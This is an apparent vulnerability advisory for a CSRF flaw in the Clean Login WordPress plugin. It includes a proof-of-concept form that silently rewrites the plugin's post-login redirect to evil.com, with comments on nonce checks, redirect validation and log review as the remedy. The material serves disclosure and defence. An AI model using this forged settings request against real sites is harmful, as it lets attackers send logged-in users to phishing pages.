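The Clean Login WordPress plugin was affected by a cross-site request forgery (CSRF) vulnerability that allows its login redirect URL to be changed. The proof-of-concept form below contains no anti-CSRF nonce field, so a settings handler that accepts it is relying on the administrator's session cookie alone to authorise the change.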
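<!--
  Proof-of-concept settings request for the CSRF issue described above.
  Field names and values are reproduced from the advisory; 127.0.0.1 and
  evil.com are stand-in hosts.

  What a reviewer should take from it:
  * The request carries no WordPress nonce. The usual remedy is to emit
    wp_nonce_field() in the settings form and to call check_admin_referer()
    (or wp_verify_nonce()) together with a current_user_can() check before
    any option is saved. The plugin's own fix is not shown on this page.
  * cl_hidden_field holds a constant string. Presumably the plugin uses it to
    recognise a settings save (confirm against the plugin source); a constant
    value is known to every requester and gives no CSRF protection.
  * loginredirect_url accepts an off-site URL. Redirect targets stored in
    options should be validated, for example with wp_validate_redirect(), or
    issued through wp_safe_redirect().
  * To check an installation, compare the stored redirect options with their
    intended values and review access logs for POST requests to the settings
    page whose Origin or Referer header is a different site.
-->
<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings">
  <input type="text" name="adminbar" value="on">
  <input type="text" name="emailnotificationcontent" value="">
  <input type="text" name="termsconditionsMSG" value="">
  <input type="text" name="termsconditionsURL" value="">
  <input type="text" name="urlredirect" value="http://127.0.0.1/wordpress">
  <input type="text" name="loginredirect" value="on">
  <!-- The setting the advisory is about: the post-login redirect target. -->
  <input type="text" name="loginredirect_url" value="http://evil.com">
  <input type="text" name="logoutredirect_url" value="http://127.0.0.1/wordpress">
  <!-- Constant marker value, not a per-session token. -->
  <input type="text" name="cl_hidden_field" value="hidden_field_to_update_others">
  <input type="text" name="Submit" value="Save Changes">
  <input type="submit">
</form>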